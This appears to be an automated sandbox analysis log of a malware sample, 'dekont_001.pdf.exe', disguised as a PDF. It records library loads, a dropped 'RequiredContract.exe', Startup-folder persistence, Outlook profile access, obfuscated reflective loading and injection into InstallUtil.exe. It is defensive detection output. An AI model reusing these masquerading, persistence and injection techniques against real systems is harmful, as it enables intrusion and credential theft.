              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: dekont_001.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: dekont_001.pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: dekont_001.pdf.exe, 00000000.00000002.1830048122.0000000002C0E000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1845271222.00000000069D0000.00000004.08000000.00040000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, dekont_001.pdf.exe, 00000000.00000002.1839865872.0000000003A8A000.00000004.00000800.00020000.00000000.sdmp, RequiredContract.exe, 00000006.00000002.2012152493.00000000035BE000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: dekont_001.pdf.exe, 00000000.00000002.1844825220.00000000067D0000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.cs.Net Code: Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777252)),Type.GetTypeFromHandle(M2UEgytwayQ67lU6gRL.jjfsQtX03R(16777284))})
              Source: dekont_001.pdf.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: dekont_001.pdf.exe, Dzrxuxeja.cs.Net Code: Hlqkqyc System.Reflection.Assembly.Load(byte[])
              Source: RequiredContract.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
              Source: RequiredContract.exe.0.dr, Dzrxuxeja.cs.Net Code: Hlqkqyc System.Reflection.Assembly.Load(byte[])
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.dekont_001.pdf.exe.3a3a158.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.dekont_001.pdf.exe.69d0000.12.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: Yara matchFile source: 0.2.dekont_001.pdf.exe.6770000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1844604505.0000000006770000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2012152493.000000000328F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1830048122.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dekont_001.pdf.exe PID: 7304, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RequiredContract.exe PID: 7844, type: MEMORYSTR
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_07106572 push edx; retf 0_2_07106573
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeCode function: 0_2_071068BB pushfd ; retf 0_2_071068C1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A2E60 push esp; iretd 1_2_066A2E79
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A6F13 push 00000006h; ret 1_2_066A6FE4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A6F8B push 00000006h; ret 1_2_066A6FE4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066A7059 push 00000006h; iretd 1_2_066A705C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 1_2_066D3181 push ebx; retf 1_2_066D3182
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_07796572 push edx; retf 6_2_07796573
              Source: C:\Users\user\AppData\Roaming\RequiredContract.exeCode function: 6_2_077968BB pushfd ; retf 6_2_077968C1
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, AssemblyLoader.csHigh entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'qxSSwWj43dbLCniLnRl'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, a0Wrvoi7XduVLTpXjo3.csHigh entropy of concatenated method names: 'UESibCoyM9', 'q41ifBB8jW', 'npfiEVDiA6', 'H9TiyRwAA4', 'sgwiToa30a', 'fWfiPCwV8W', 'PK0il9Xx8l', 'o0biqN9AYV', 'dPji9Cyue1', 'b7OiWa7Q7a'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, j2m4JydgbMdCv8j2O8Y.csHigh entropy of concatenated method names: 'hrleFEjUWqvHtdK2GaW', 'XkuYYejCqaVNdj7tnc2', 'CSgttyVSkf', 'AmlAInjSVsPNtENyWT9', 'aiIL0RjJfZqeOGpYyf4', 'P5pAiYj8Ne93Nwk8MP6', 'xjpp0SjsGhbEy7kiHR3', 'CfxuhAju77ulIT6RImd', 'L8iaY5jpeyWubAfoR66', 'hQeQjGjAdnCkcidSwPM'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, b5qFSvtz87Q53JYvQi2.csHigh entropy of concatenated method names: 'd9SP6sTsuN', 'DvuPh4e5au', 'jkFPa25Nth', 'Cu8PxUor1J', 'GIgPn9OnNc', 'mwjP3pK8mQ', 'uKCPceh8hR', 'hdkf2wBX0j', 'lY1PRS4cBm', 'XeiPwKT1VR'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, YyRCunmwdBwrfBllKYy.csHigh entropy of concatenated method names: 'XQnmk0Lmh7', 'wKum0tjon0', 'VkQmgID1Te', 'CEumULoo6k', 'MEtmCBS0kY', 'TXE4GJUycWY4B1bjebV', 'RNlrreUTyt9stERkm1D', 'hegsjuUPiVpialHeHV1', 'auGWHLUleEpsuBelrXO', 'RiPKMUUqXfQaPfhhCET'
              Source: 0.2.dekont_001.pdf.exe.3921b78.7.raw.unpack, hXhXjatUErAUcNrfNHH.csHigh entropy of concatenated method names: 'DGltGUPsaY', 'wfltocntFJ', 'o1qtrP0042', 'dB0t53Xxps', 'jvVtvXlTLD', 'mL8tOyiEBj', 't6Et16pybx', 'DNatHC3huc', 'mHutFjVGm0', 'alftQUu3L4'
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile created: C:\Users\user\AppData\Roaming\RequiredContract.exeJump to dropped file

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbsJump to dropped file
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbsJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RequiredContract.vbsJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: Possible double extension: pdf.exeStatic PE information: dekont_001.pdf.exe
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\dekont_001.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
